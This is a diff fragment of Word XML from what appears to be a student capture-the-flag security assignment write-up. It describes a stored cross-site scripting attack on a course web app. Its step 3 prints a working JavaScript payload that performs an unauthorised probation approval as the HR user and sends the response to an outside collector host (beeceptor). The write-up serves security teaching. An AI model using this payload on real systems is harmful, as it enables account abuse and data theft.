+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3637" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>A</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ttackers</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">find the </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>stored cross-site scripting</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> injection point</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> by s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ubmitting this payload as an anonymous question</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16F510E5" wp14:editId="5DD08099">
+                  <wp:extent cx="1638300" cy="780807"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
+                  <wp:docPr id="4" name="Picture 4"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="4" name="Picture 4"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId14" cstate="print">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1665991" cy="794005"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="573" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4809" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3637" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>B</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ecause no sensitive information can be stolen as shown in step 1, attackers keep exploring for hints of performing unauthorised actions. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>The following code looks suspicious.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B9977E" wp14:editId="112394C3">
+                  <wp:extent cx="1666875" cy="566394"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+                  <wp:docPr id="5" name="Picture 5"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="5" name="Picture 5"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId15"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1741200" cy="591649"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>V</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">isiting </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId16" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:t>http://assignment-hermes.unimelb.life/</w:t>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:br/>
+                <w:t>pass_probation.php</w:t>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:br/>
+                <w:t>?user=xiandew</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> directly in the browser shows “</w:t>
+            </w:r>
+            <w:r>
+              <w:t>Unauthorised!</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>”.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="573" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4809" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;!--</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> xss.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">  var </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.onload</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.send("test=" +</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>this.responseText</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.open</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3637" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>I</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">njecting this payload as an anonymous question </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>will make the user “</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xiandew</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>” pass the probation on behalf of the HR team member who reads the question and we have “Updated” as the response</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> instead</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="190E6CE6" wp14:editId="02A1EF28">
+                  <wp:extent cx="1679663" cy="435907"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+                  <wp:docPr id="6" name="Picture 6"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId17"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1735839" cy="450486"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>In the user profile page, we can see that the user successfully passed the probation and leaked out the sensitive information (in form of the flag)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D8B95B" wp14:editId="0281254E">
